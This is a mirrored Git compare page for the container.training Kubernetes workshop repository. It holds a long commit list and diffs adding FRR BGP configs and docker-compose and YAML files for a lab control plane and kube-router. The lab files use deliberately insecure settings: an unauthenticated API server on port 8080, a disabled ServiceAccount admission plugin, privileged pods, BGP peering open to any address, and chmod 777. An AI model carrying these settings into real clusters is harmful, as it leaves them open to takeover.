mirror of
https://github.com/jpetazzo/container.training.git
synced 2026-02-15 10:09:56 +00:00
Compare commits
663 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
8dacf00bf3 | ||
|
|
454843b755 | ||
|
|
63e68ab720 | ||
|
|
46f0bc0dfb | ||
|
|
16bb3f1847 | ||
|
|
fef3fa31fb | ||
|
|
b844e40372 | ||
|
|
5b5d5946e8 | ||
|
|
af6705fb1e | ||
|
|
bfd63c16c6 | ||
|
|
c506038682 | ||
|
|
7d8fdd43bd | ||
|
|
adf0f53aab | ||
|
|
49fe1b8e17 | ||
|
|
073a5f8c84 | ||
|
|
032803806d | ||
|
|
f7b327a33a | ||
|
|
d3526aac00 | ||
|
|
3736dd6e86 | ||
|
|
c03f199023 | ||
|
|
8ba9c2e41b | ||
|
|
36d1199b70 | ||
|
|
56e09eef6d | ||
|
|
15f71506b6 | ||
|
|
5eb8453597 | ||
|
|
65ee4e3885 | ||
|
|
ac801746eb | ||
|
|
0af16b98c9 | ||
|
|
2fde58a3ee | ||
|
|
38fec0b00d | ||
|
|
627800ddd5 | ||
|
|
871aab23ad | ||
|
|
8d7fa29a79 | ||
|
|
22f09c37a3 | ||
|
|
eacffe3cc5 | ||
|
|
d044f2bbd0 | ||
|
|
a3da2615ff | ||
|
|
9a1ea0f1bd | ||
|
|
67ac03e76e | ||
|
|
38725cf3da | ||
|
|
3e98148e3f | ||
|
|
b988c28b41 | ||
|
|
583933c492 | ||
|
|
ebadc1ca59 | ||
|
|
7f85c645f0 | ||
|
|
ed5009c769 | ||
|
|
e2f3034a96 | ||
|
|
8933e6aa1b | ||
|
|
784b2a3e4e | ||
|
|
f3bbd6377b | ||
|
|
04d3a7b360 | ||
|
|
a32df01165 | ||
|
|
ba323cb4e6 | ||
|
|
745a435a1a | ||
|
|
db276af182 | ||
|
|
87462939d9 | ||
|
|
7d6ab6974d | ||
|
|
ae606b9c40 | ||
|
|
da9921d68a | ||
|
|
3e9a939578 | ||
|
|
328a2edaaf | ||
|
|
1f826d7993 | ||
|
|
cff9cbdfbb | ||
|
|
3ea6b730c8 | ||
|
|
1c6c76162f | ||
|
|
52bafdb57e | ||
|
|
c4d9e6b3e1 | ||
|
|
5160dd39a0 | ||
|
|
3c1220be83 | ||
|
|
6a814cf039 | ||
|
|
1385a1bae2 | ||
|
|
68a6546276 | ||
|
|
8a2ca450ee | ||
|
|
6e8ac173e0 | ||
|
|
97e68ae185 | ||
|
|
148ddd5174 | ||
|
|
e8eb11e257 | ||
|
|
fe9b56572e | ||
|
|
7281ca3ca0 | ||
|
|
34a17aa097 | ||
|
|
b37dd85eff | ||
|
|
4811420d55 | ||
|
|
a824afec85 | ||
|
|
89d9fcb1c4 | ||
|
|
5b488fbe62 | ||
|
|
6d01a9d813 | ||
|
|
cb81469170 | ||
|
|
c595a337e4 | ||
|
|
03d2d0bc5d | ||
|
|
2c46106792 | ||
|
|
291d2a6c92 | ||
|
|
f73fb92832 | ||
|
|
e9e2fa0e50 | ||
|
|
a0162d37f1 | ||
|
|
a61b69ad9a | ||
|
|
3388db4272 | ||
|
|
d2d901302f | ||
|
|
1fae4253bc | ||
|
|
f7f5ab1304 | ||
|
|
7addacef22 | ||
|
|
0136391ab5 | ||
|
|
ed27ad1d1e | ||
|
|
c15aa708df | ||
|
|
5749348883 | ||
|
|
bc885f3dca | ||
|
|
bbe35a3901 | ||
|
|
eb17b4c628 | ||
|
|
a4d50a5439 | ||
|
|
98d2b79c97 | ||
|
|
8320534a5c | ||
|
|
74ece65947 | ||
|
|
7444f8d71e | ||
|
|
c9bc417a32 | ||
|
|
7d4331477a | ||
|
|
ff132fd728 | ||
|
|
4ec7b1d7f4 | ||
|
|
e08e7848ed | ||
|
|
be6afa3e5e | ||
|
|
c340d909de | ||
|
|
b667cf7cfc | ||
|
|
e04998e9cd | ||
|
|
84198b3fdc | ||
|
|
5c161d2090 | ||
|
|
0fc7c2316c | ||
|
|
fb64c0d68f | ||
|
|
23aaf7f58c | ||
|
|
6cbcc4ae69 | ||
|
|
0b80238736 | ||
|
|
4c285b5318 | ||
|
|
2095a15728 | ||
|
|
13ba8cef9d | ||
|
|
be2374c672 | ||
|
|
f96da2d260 | ||
|
|
5958874071 | ||
|
|
370bdf9aaf | ||
|
|
381cd27037 | ||
|
|
c409c6997a | ||
|
|
eb2e74f236 | ||
|
|
169d850fc7 | ||
|
|
96104193ba | ||
|
|
5a5a08cf25 | ||
|
|
82b7b7ba88 | ||
|
|
8c4a0a3fce | ||
|
|
f4f0fb0f23 | ||
|
|
8dfcb440c8 | ||
|
|
f3622d98fe | ||
|
|
b1fc7580a1 | ||
|
|
ab77d89232 | ||
|
|
04f728c67a | ||
|
|
5bbce4783a | ||
|
|
889c79addb | ||
|
|
c4b408621c | ||
|
|
49df28d44f | ||
|
|
46878ed6c7 | ||
|
|
b5b005b6d2 | ||
|
|
9e991d1900 | ||
|
|
ace911a208 | ||
|
|
ead027a62e | ||
|
|
09c832031b | ||
|
|
34fca341bc | ||
|
|
af18c5ab9f | ||
|
|
afa3a59461 | ||
|
|
1abfac419b | ||
|
|
edd2f749c0 | ||
|
|
2365b8f460 | ||
|
|
c7a504dcb4 | ||
|
|
ffb15c8316 | ||
|
|
f7fbe1b056 | ||
|
|
4be1b40586 | ||
|
|
91fb2f167c | ||
|
|
02dcb58f77 | ||
|
|
3a816568da | ||
|
|
9a184c6d44 | ||
|
|
ba4ec23767 | ||
|
|
c690a02d37 | ||
|
|
6bbf8a123c | ||
|
|
cede1a4c12 | ||
|
|
e24a1755ec | ||
|
|
44e84c5f23 | ||
|
|
947ab97b14 | ||
|
|
45ea521acd | ||
|
|
99d2e99cea | ||
|
|
0d4b7d6c7e | ||
|
|
45ac1768a3 | ||
|
|
f0d991cd02 | ||
|
|
4e1950821d | ||
|
|
2668a73fb0 | ||
|
|
2d56d9f57c | ||
|
|
b27f960483 | ||
|
|
50211dcc6e | ||
|
|
35654762b3 | ||
|
|
a77fe701b7 | ||
|
|
dee48d950e | ||
|
|
645d424a54 | ||
|
|
875c552029 | ||
|
|
c2eb0de99a | ||
|
|
9efe1f3129 | ||
|
|
14b7670c7d | ||
|
|
f20e0b1435 | ||
|
|
26317315b5 | ||
|
|
5bf39669e3 | ||
|
|
c06b680fed | ||
|
|
ba34183774 | ||
|
|
abda9431ae | ||
|
|
581635044b | ||
|
|
b041a2f9ec | ||
|
|
7fd8b7db2d | ||
|
|
dcd91c46b7 | ||
|
|
076a68379d | ||
|
|
741faed32e | ||
|
|
9a9f7a3c72 | ||
|
|
a458c41068 | ||
|
|
ce6cdae80c | ||
|
|
73f0d61759 | ||
|
|
0ae7d38b68 | ||
|
|
093e3ab5ab | ||
|
|
be72fbe80a | ||
|
|
560328327c | ||
|
|
9f1d2581fc | ||
|
|
ab1a360cdc | ||
|
|
860907ccf0 | ||
|
|
ad4c86b3f4 | ||
|
|
8f7ca0d261 | ||
|
|
626e4a8e35 | ||
|
|
b21f61ad27 | ||
|
|
bac0d9febd | ||
|
|
313df8f9ff | ||
|
|
ef6a5f05f8 | ||
|
|
d71a636a9d | ||
|
|
990a873e81 | ||
|
|
98836d85cf | ||
|
|
c959a4c4a1 | ||
|
|
c3a796faef | ||
|
|
56cc65daf2 | ||
|
|
a541e53c78 | ||
|
|
7a63dfb0cf | ||
|
|
093cfd1c24 | ||
|
|
8492524798 | ||
|
|
12b625d4f6 | ||
|
|
a78e99d97e | ||
|
|
161b8aed7d | ||
|
|
4f1252d0b6 | ||
|
|
1b407cbc5e | ||
|
|
dd6f3c9eee | ||
|
|
d4afae54b8 | ||
|
|
730ef0f421 | ||
|
|
c1f9082fdc | ||
|
|
1fcb223a1d | ||
|
|
5e520dfbe5 | ||
|
|
91d3f025b0 | ||
|
|
79b8e5f2f0 | ||
|
|
f809faadb9 | ||
|
|
4e225fdaf5 | ||
|
|
36be4eaa9f | ||
|
|
57aa25fda0 | ||
|
|
42ed6fc56a | ||
|
|
5aedee5564 | ||
|
|
0a2879e1a5 | ||
|
|
3e87e69608 | ||
|
|
b572d06f82 | ||
|
|
2c0b4b15ba | ||
|
|
f91e995e90 | ||
|
|
59c2ff1911 | ||
|
|
879e7f2ec9 | ||
|
|
ad4cc074c1 | ||
|
|
ab8b478648 | ||
|
|
68f35bd2ed | ||
|
|
964b92d320 | ||
|
|
db961b486f | ||
|
|
a90dcf1d9a | ||
|
|
f4ef2bd6d4 | ||
|
|
baf428ebdb | ||
|
|
3a87183a66 | ||
|
|
3f70ee2c2a | ||
|
|
68a26ae501 | ||
|
|
2ef72a4dd8 | ||
|
|
f4e16dccc4 | ||
|
|
4c55336079 | ||
|
|
b22d3e3d21 | ||
|
|
7b8370dc12 | ||
|
|
db6d2c8188 | ||
|
|
eb02875bd0 | ||
|
|
4ba954cae4 | ||
|
|
84b691a89d | ||
|
|
c1e9073781 | ||
|
|
6593f4ad42 | ||
|
|
bde7f75881 | ||
|
|
25c820c87a | ||
|
|
39027675d5 | ||
|
|
f8e0de3519 | ||
|
|
3a512779b2 | ||
|
|
d987f21cba | ||
|
|
1f08425437 | ||
|
|
f69c9853bb | ||
|
|
c565dad43c | ||
|
|
e48c23e4f4 | ||
|
|
eb04aacb5e | ||
|
|
b0f01e018c | ||
|
|
9504f81526 | ||
|
|
12ef2eb66e | ||
|
|
e4311a3037 | ||
|
|
7309304ced | ||
|
|
26c876174a | ||
|
|
9775954b42 | ||
|
|
d4500eff5a | ||
|
|
0ba6adb027 | ||
|
|
d3af9ff333 | ||
|
|
c9dc6fa7cb | ||
|
|
485704a169 | ||
|
|
72fa8c366b | ||
|
|
8ea4b23530 | ||
|
|
785a8178ca | ||
|
|
0dfff26410 | ||
|
|
5b4debfd81 | ||
|
|
69f9cee6c9 | ||
|
|
4c44f3e690 | ||
|
|
b69119eed4 | ||
|
|
940694a2b0 | ||
|
|
c3de1049f1 | ||
|
|
116515d19b | ||
|
|
098671ec20 | ||
|
|
51e77cb62c | ||
|
|
e2044fc2b2 | ||
|
|
f795d67f02 | ||
|
|
6f6dc66818 | ||
|
|
0ae39339b9 | ||
|
|
e6b73a98f4 | ||
|
|
03657ea896 | ||
|
|
4106059d4a | ||
|
|
2c0ed6ea2a | ||
|
|
3557a546e1 | ||
|
|
d3dd5503cf | ||
|
|
82f8f41639 | ||
|
|
dff8c1e43a | ||
|
|
9deeddc83a | ||
|
|
dc7c1e95ca | ||
|
|
a4babd1a77 | ||
|
|
609756b4f3 | ||
|
|
c367ad1156 | ||
|
|
06aba6737a | ||
|
|
b9c08613ed | ||
|
|
da2264d1ca | ||
|
|
66fbd7ee9e | ||
|
|
a78bb4b2bf | ||
|
|
9dbd995c85 | ||
|
|
b535d43b02 | ||
|
|
a77aabcf95 | ||
|
|
b42e4e6f80 | ||
|
|
1af958488e | ||
|
|
2fe4644225 | ||
|
|
3d001b0585 | ||
|
|
e42d9be1ce | ||
|
|
d794c8df42 | ||
|
|
85144c4f55 | ||
|
|
fba198d4d7 | ||
|
|
da8b4fb972 | ||
|
|
74c9286087 | ||
|
|
d4c3686a2a | ||
|
|
9a66481cfd | ||
|
|
f5d523d3c8 | ||
|
|
9296b375f3 | ||
|
|
6d761b4dcc | ||
|
|
fada4e8ae7 | ||
|
|
dbcb4371d4 | ||
|
|
3f40cc25a2 | ||
|
|
aa55a5b870 | ||
|
|
f272df9aae | ||
|
|
b92da2cf9f | ||
|
|
fea69f62d6 | ||
|
|
627c3361a1 | ||
|
|
603baa0966 | ||
|
|
dd5a66704c | ||
|
|
95b05d8a23 | ||
|
|
c761ce9436 | ||
|
|
020cfeb0ad | ||
|
|
4c89d48a0b | ||
|
|
e2528191cd | ||
|
|
50710539af | ||
|
|
0e7c05757f | ||
|
|
6b21fa382a | ||
|
|
1ff3b52878 | ||
|
|
307fd18f2c | ||
|
|
ad81ae0109 | ||
|
|
11c8ded632 | ||
|
|
5413126534 | ||
|
|
ddcb02b759 | ||
|
|
ff111a2610 | ||
|
|
5a4adb700a | ||
|
|
7c9f144f89 | ||
|
|
cde7c566f0 | ||
|
|
8b2a8fbab6 | ||
|
|
1e77f57434 | ||
|
|
2dc634e1f5 | ||
|
|
df185c88a5 | ||
|
|
f40b8a1bfa | ||
|
|
ded5fbdcd4 | ||
|
|
038563b5ea | ||
|
|
d929f5f84c | ||
|
|
cd1dafd9e5 | ||
|
|
945586d975 | ||
|
|
aa6b74efcb | ||
|
|
4784a41a37 | ||
|
|
0d551f682e | ||
|
|
9cc422f782 | ||
|
|
287f6e1cdf | ||
|
|
2d3ddc570e | ||
|
|
82c26c2f19 | ||
|
|
6636f92cf5 | ||
|
|
ff4219ab5d | ||
|
|
71cfade398 | ||
|
|
c44449399a | ||
|
|
637c46e372 | ||
|
|
ad9f845184 | ||
|
|
3368e21831 | ||
|
|
46ce3d0b3d | ||
|
|
41eb916811 | ||
|
|
1c76e23525 | ||
|
|
2b2d7c5544 | ||
|
|
84c233a954 | ||
|
|
0019b22f1d | ||
|
|
6fe1727061 | ||
|
|
a4b23e3f02 | ||
|
|
d5fd297c2d | ||
|
|
3ad1e89620 | ||
|
|
d1609f0725 | ||
|
|
ef70ed8006 | ||
|
|
5f75f04c97 | ||
|
|
38097a17df | ||
|
|
afa7b47c7a | ||
|
|
4d475334b5 | ||
|
|
59f2416c56 | ||
|
|
9c5fa6f15e | ||
|
|
c1e6fe1d11 | ||
|
|
99adc846ba | ||
|
|
1ee4c31135 | ||
|
|
6f655bff03 | ||
|
|
7fbabd5cc2 | ||
|
|
c1d4df38e5 | ||
|
|
8e6a18d5f7 | ||
|
|
d902f2e6e6 | ||
|
|
8ba825db54 | ||
|
|
1309409528 | ||
|
|
b3a9a017d9 | ||
|
|
3c6cbff913 | ||
|
|
48a5fb5c7a | ||
|
|
ed11f089e1 | ||
|
|
461020300d | ||
|
|
f4e4d13f68 | ||
|
|
5b2a5c1f05 | ||
|
|
fdf5a1311a | ||
|
|
95e2128e7c | ||
|
|
4a8cc82326 | ||
|
|
a4e50f6c6f | ||
|
|
a85266c44c | ||
|
|
5977b11f33 | ||
|
|
3351cf2d13 | ||
|
|
facb5997b7 | ||
|
|
b4d2a5769a | ||
|
|
2cff684e79 | ||
|
|
ea3e19c5c5 | ||
|
|
d9c8f2bc57 | ||
|
|
304faff96b | ||
|
|
852135df9a | ||
|
|
9b4413f332 | ||
|
|
e5a7e15ef8 | ||
|
|
52be1aa464 | ||
|
|
6a644e53e0 | ||
|
|
3f8ec37225 | ||
|
|
cf3fae6db1 | ||
|
|
c9b85650cb | ||
|
|
964057cd52 | ||
|
|
da13946ba0 | ||
|
|
f6d154cb84 | ||
|
|
1657503da1 | ||
|
|
af8441912e | ||
|
|
e16c1d982a | ||
|
|
1fb0ec7580 | ||
|
|
ad80914000 | ||
|
|
d877844a5e | ||
|
|
195c08cb91 | ||
|
|
8a3dad3206 | ||
|
|
4f59e293ee | ||
|
|
8753279603 | ||
|
|
d84c585fdc | ||
|
|
b8f8ffa07d | ||
|
|
4f2ecb0f4a | ||
|
|
662b3a47a0 | ||
|
|
8325dcc6a0 | ||
|
|
42c1a93d5f | ||
|
|
8d1737c2b3 | ||
|
|
8045215c63 | ||
|
|
ad20e1efe6 | ||
|
|
ae6a5a5800 | ||
|
|
0160d9f287 | ||
|
|
f0f3d70521 | ||
|
|
53cf52f05c | ||
|
|
e280cec60f | ||
|
|
c8047897e7 | ||
|
|
cc071b79c3 | ||
|
|
869f46060a | ||
|
|
258c134421 | ||
|
|
c6d9edbf12 | ||
|
|
5fc62e8fd7 | ||
|
|
f207adfe13 | ||
|
|
8c2107fba9 | ||
|
|
d4096e9c21 | ||
|
|
5c89738ab6 | ||
|
|
893a84feb7 | ||
|
|
f807964416 | ||
|
|
2ea9cbb00f | ||
|
|
8cd9a314d3 | ||
|
|
ede085cf48 | ||
|
|
bc349d6c4d | ||
|
|
80d6b57697 | ||
|
|
5c2599a2b9 | ||
|
|
a6f6ff161d | ||
|
|
6aaa8fab75 | ||
|
|
01042101a2 | ||
|
|
5afb37a3b9 | ||
|
|
995ea626db | ||
|
|
a1adbb66c8 | ||
|
|
3212561c89 | ||
|
|
003a232b79 | ||
|
|
2770da68cd | ||
|
|
c502d019ff | ||
|
|
a07e50ecf8 | ||
|
|
46c6866ce9 | ||
|
|
fe95318108 | ||
|
|
65232f93ba | ||
|
|
9fa7b958dc | ||
|
|
a95e5c960e | ||
|
|
5b87162e95 | ||
|
|
8c4914294e | ||
|
|
7b9b9f527d | ||
|
|
3c7f39747c | ||
|
|
be67a742ee | ||
|
|
40cd934118 | ||
|
|
556db65251 | ||
|
|
ff781a3065 | ||
|
|
8348d750df | ||
|
|
9afa0acbf9 | ||
|
|
cb624755e4 | ||
|
|
523ca55831 | ||
|
|
f0b48935fa | ||
|
|
abcc47b563 | ||
|
|
33e1bfd8be | ||
|
|
2efc29991e | ||
|
|
11387f1330 | ||
|
|
fe93dccbac | ||
|
|
5fad84a7cf | ||
|
|
22dd6b4e70 | ||
|
|
a3594e7e1e | ||
|
|
7f74e5ce32 | ||
|
|
9e051abb32 | ||
|
|
3ebcfd142b | ||
|
|
6c5d049c4c | ||
|
|
072ba44cba | ||
|
|
bc8a9dc4e7 | ||
|
|
b1ba881eee | ||
|
|
337a5d94ed | ||
|
|
43acccc0af | ||
|
|
4a447c7bf5 | ||
|
|
b9de73d0fd | ||
|
|
3f7675be04 | ||
|
|
b4bb9e5958 | ||
|
|
9a6160ba1f | ||
|
|
1d243b72ec | ||
|
|
c5c1ccaa25 | ||
|
|
b68afe502b | ||
|
|
d18cacab4c | ||
|
|
2faca4a507 | ||
|
|
d797ec62ed | ||
|
|
a475d63789 | ||
|
|
dd3f2d054f | ||
|
|
73594fd505 | ||
|
|
16a1b5c6b5 | ||
|
|
ff7a257844 | ||
|
|
77046a8ddf | ||
|
|
3ca696f059 | ||
|
|
305db76340 | ||
|
|
b1672704e8 | ||
|
|
c058f67a1f | ||
|
|
ab56c63901 | ||
|
|
a5341f9403 | ||
|
|
b2bdac3384 | ||
|
|
a2531a0c63 | ||
|
|
84e2b90375 | ||
|
|
9639dfb9cc | ||
|
|
8722de6da2 | ||
|
|
f2f87e52b0 | ||
|
|
56ad2845e7 | ||
|
|
f23272d154 | ||
|
|
86e35480a4 | ||
|
|
1020a8ff86 | ||
|
|
20b1079a22 | ||
|
|
f090172413 | ||
|
|
e4251cfa8f | ||
|
|
b6dd55b21c | ||
|
|
53d1a68765 | ||
|
|
156ce67413 | ||
|
|
e372850b06 | ||
|
|
f543b54426 | ||
|
|
35614714c8 | ||
|
|
100c6b46cf | ||
|
|
36ccaf7ea4 | ||
|
|
4a655db1ba | ||
|
|
2a80586504 | ||
|
|
0a942118c1 | ||
|
|
2f1ad67fb3 | ||
|
|
4b0ac6d0e3 | ||
|
|
ac273da46c | ||
|
|
7a6594c96d | ||
|
|
657b7465c6 | ||
|
|
08059a845f | ||
|
|
24e2042c9d | ||
|
|
9771f054ea | ||
|
|
5db4e2adfa | ||
|
|
bde5db49a7 | ||
|
|
7c6b2730f5 | ||
|
|
7f6a15fbb7 | ||
|
|
d97b1e5944 | ||
|
|
1519196c95 | ||
|
|
f8629a2689 | ||
|
|
fadecd52ee | ||
|
|
524d6e4fc1 | ||
|
|
51f5f5393c | ||
|
|
f574afa9d2 | ||
|
|
4f49015a6e | ||
|
|
f25d12b53d | ||
|
|
78259c3eb6 | ||
|
|
adc922e4cd | ||
|
|
f68194227c | ||
|
|
29a3ce0ba2 | ||
|
|
e5fe27dd54 | ||
|
|
6016ffe7d7 | ||
|
|
7c94a6f689 | ||
|
|
5953ffe10b | ||
|
|
3016019560 | ||
|
|
0d5da73c74 | ||
|
|
91c835fcb4 | ||
|
|
d01ae0ff39 | ||
|
|
63b85da4f6 | ||
|
|
2406e72210 | ||
|
|
32e1edc2a2 | ||
|
|
84225e982f | ||
|
|
e76a06e942 | ||
|
|
0519682c30 | ||
|
|
91f7a81964 | ||
|
|
a66fcaf04c | ||
|
|
9a0649e671 | ||
|
|
d23ad0cd8f | ||
|
|
63755c1cd3 | ||
|
|
149cf79615 | ||
|
|
a627128570 | ||
|
|
91e3078d2e | ||
|
|
31dd943141 | ||
|
|
3866701475 | ||
|
|
521f8e9889 | ||
|
|
49c3fdd3b2 | ||
|
|
4bb6a49ee0 | ||
|
|
cb407e75ab | ||
|
|
27d4612449 | ||
|
|
43ab5f79b6 |
19
.gitignore
vendored
19
.gitignore
vendored
@@ -1,13 +1,24 @@
|
||||
*.pyc
|
||||
*.swp
|
||||
*~
|
||||
prepare-vms/ips.txt
|
||||
prepare-vms/ips.html
|
||||
prepare-vms/ips.pdf
|
||||
prepare-vms/settings.yaml
|
||||
prepare-vms/tags
|
||||
prepare-vms/infra
|
||||
prepare-vms/www
|
||||
slides/*.yml.html
|
||||
slides/autopilot/state.yaml
|
||||
slides/index.html
|
||||
slides/past.html
|
||||
slides/slides.zip
|
||||
node_modules
|
||||
|
||||
### macOS ###
|
||||
# General
|
||||
.DS_Store
|
||||
.AppleDouble
|
||||
.LSOverride
|
||||
|
||||
### Windows ###
|
||||
# Windows thumbnail cache files
|
||||
Thumbs.db
|
||||
ehthumbs.db
|
||||
ehthumbs_vista.db
|
||||
|
||||
1
.gitpod.yml
Normal file
1
.gitpod.yml
Normal file
@@ -0,0 +1 @@
|
||||
image: jpetazzo/shpod
|
||||
@@ -39,7 +39,7 @@ your own tutorials.
|
||||
All these materials have been gathered in a single repository
|
||||
because they have a few things in common:
|
||||
|
||||
- some [common slides](slides/common/) that are re-used
|
||||
- some [shared slides](slides/shared/) that are re-used
|
||||
(and updated) identically between different decks;
|
||||
- a [build system](slides/) generating HTML slides from
|
||||
Markdown source files;
|
||||
@@ -199,7 +199,7 @@ this section is for you!
|
||||
locked-down computer, host firewall, etc.
|
||||
- Horrible wifi, or ssh port TCP/22 not open on network! If wifi sucks you
|
||||
can try using MOSH https://mosh.org which handles SSH over UDP. TMUX can also
|
||||
prevent you from loosing your place if you get disconnected from servers.
|
||||
prevent you from losing your place if you get disconnected from servers.
|
||||
https://tmux.github.io
|
||||
- Forget to print "cards" and cut them up for handing out IP's.
|
||||
- Forget to have fun and focus on your students!
|
||||
|
||||
9
compose/frr-route-reflector/conf/bgpd.conf
Normal file
9
compose/frr-route-reflector/conf/bgpd.conf
Normal file
@@ -0,0 +1,9 @@
|
||||
hostname frr
|
||||
router bgp 64512
|
||||
network 1.0.0.2/32
|
||||
bgp log-neighbor-changes
|
||||
neighbor kube peer-group
|
||||
neighbor kube remote-as 64512
|
||||
neighbor kube route-reflector-client
|
||||
bgp listen range 0.0.0.0/0 peer-group kube
|
||||
log stdout
|
||||
0
compose/frr-route-reflector/conf/vtysh.conf
Normal file
0
compose/frr-route-reflector/conf/vtysh.conf
Normal file
2
compose/frr-route-reflector/conf/zebra.conf
Normal file
2
compose/frr-route-reflector/conf/zebra.conf
Normal file
@@ -0,0 +1,2 @@
|
||||
hostname frr
|
||||
log stdout
|
||||
34
compose/frr-route-reflector/docker-compose.yaml
Normal file
34
compose/frr-route-reflector/docker-compose.yaml
Normal file
@@ -0,0 +1,34 @@
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
bgpd:
|
||||
image: ajones17/frr:662
|
||||
volumes:
|
||||
- ./conf:/etc/frr
|
||||
- ./run:/var/run/frr
|
||||
network_mode: host
|
||||
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
|
||||
restart: always
|
||||
|
||||
zebra:
|
||||
image: ajones17/frr:662
|
||||
volumes:
|
||||
- ./conf:/etc/frr
|
||||
- ./run:/var/run/frr
|
||||
network_mode: host
|
||||
entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
|
||||
restart: always
|
||||
|
||||
vtysh:
|
||||
image: ajones17/frr:662
|
||||
volumes:
|
||||
- ./conf:/etc/frr
|
||||
- ./run:/var/run/frr
|
||||
network_mode: host
|
||||
entrypoint: vtysh -c "show ip bgp"
|
||||
|
||||
chmod:
|
||||
image: alpine
|
||||
volumes:
|
||||
- ./run:/var/run/frr
|
||||
command: chmod 777 /var/run/frr
|
||||
29
compose/kube-router-k8s-control-plane/docker-compose.yaml
Normal file
29
compose/kube-router-k8s-control-plane/docker-compose.yaml
Normal file
@@ -0,0 +1,29 @@
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
|
||||
pause:
|
||||
ports:
|
||||
- 8080:8080
|
||||
image: k8s.gcr.io/pause
|
||||
|
||||
etcd:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/etcd:3.4.3
|
||||
command: etcd
|
||||
|
||||
kube-apiserver:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
|
||||
|
||||
kube-controller-manager:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
|
||||
"Edit the CLUSTER placeholder first. Then, remove this line.":
|
||||
|
||||
kube-scheduler:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-scheduler --master http://localhost:8080
|
||||
128
compose/kube-router-k8s-control-plane/kuberouter.yaml
Normal file
128
compose/kube-router-k8s-control-plane/kuberouter.yaml
Normal file
@@ -0,0 +1,128 @@
|
||||
---
|
||||
apiVersion: |+
|
||||
|
||||
|
||||
Make sure you update the line with --master=http://X.X.X.X:8080 below.
|
||||
Then remove this section from this YAML file and try again.
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: kube-router-cfg
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: kube-router
|
||||
data:
|
||||
cni-conf.json: |
|
||||
{
|
||||
"cniVersion":"0.3.0",
|
||||
"name":"mynet",
|
||||
"plugins":[
|
||||
{
|
||||
"name":"kubernetes",
|
||||
"type":"bridge",
|
||||
"bridge":"kube-bridge",
|
||||
"isDefaultGateway":true,
|
||||
"ipam":{
|
||||
"type":"host-local"
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kube-router
|
||||
name: kube-router
|
||||
namespace: kube-system
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: kube-router
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kube-router
|
||||
annotations:
|
||||
scheduler.alpha.kubernetes.io/critical-pod: ''
|
||||
spec:
|
||||
serviceAccountName: kube-router
|
||||
containers:
|
||||
- name: kube-router
|
||||
image: docker.io/cloudnativelabs/kube-router
|
||||
imagePullPolicy: Always
|
||||
args:
|
||||
- "--run-router=true"
|
||||
- "--run-firewall=true"
|
||||
- "--run-service-proxy=true"
|
||||
- "--master=http://X.X.X.X:8080"
|
||||
env:
|
||||
- name: NODE_NAME
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: spec.nodeName
|
||||
- name: KUBE_ROUTER_CNI_CONF_FILE
|
||||
value: /etc/cni/net.d/10-kuberouter.conflist
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
path: /healthz
|
||||
port: 20244
|
||||
initialDelaySeconds: 10
|
||||
periodSeconds: 3
|
||||
resources:
|
||||
requests:
|
||||
cpu: 250m
|
||||
memory: 250Mi
|
||||
securityContext:
|
||||
privileged: true
|
||||
volumeMounts:
|
||||
- name: lib-modules
|
||||
mountPath: /lib/modules
|
||||
readOnly: true
|
||||
- name: cni-conf-dir
|
||||
mountPath: /etc/cni/net.d
|
||||
initContainers:
|
||||
- name: install-cni
|
||||
image: busybox
|
||||
imagePullPolicy: Always
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- set -e -x;
|
||||
if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
|
||||
if [ -f /etc/cni/net.d/*.conf ]; then
|
||||
rm -f /etc/cni/net.d/*.conf;
|
||||
fi;
|
||||
TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
|
||||
cp /etc/kube-router/cni-conf.json ${TMP};
|
||||
mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
|
||||
fi
|
||||
volumeMounts:
|
||||
- mountPath: /etc/cni/net.d
|
||||
name: cni-conf-dir
|
||||
- mountPath: /etc/kube-router
|
||||
name: kube-router-cfg
|
||||
hostNetwork: true
|
||||
tolerations:
|
||||
- key: CriticalAddonsOnly
|
||||
operator: Exists
|
||||
- effect: NoSchedule
|
||||
key: node-role.kubernetes.io/master
|
||||
operator: Exists
|
||||
- effect: NoSchedule
|
||||
key: node.kubernetes.io/not-ready
|
||||
operator: Exists
|
||||
volumes:
|
||||
- name: lib-modules
|
||||
hostPath:
|
||||
path: /lib/modules
|
||||
- name: cni-conf-dir
|
||||
hostPath:
|
||||
path: /etc/cni/net.d
|
||||
- name: kube-router-cfg
|
||||
configMap:
|
||||
name: kube-router-cfg
|
||||
|
||||
28
compose/simple-k8s-control-plane/docker-compose.yaml
Normal file
28
compose/simple-k8s-control-plane/docker-compose.yaml
Normal file
@@ -0,0 +1,28 @@
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
|
||||
pause:
|
||||
ports:
|
||||
- 8080:8080
|
||||
image: k8s.gcr.io/pause
|
||||
|
||||
etcd:
|
||||
network_mode: "service:pause"
|
||||
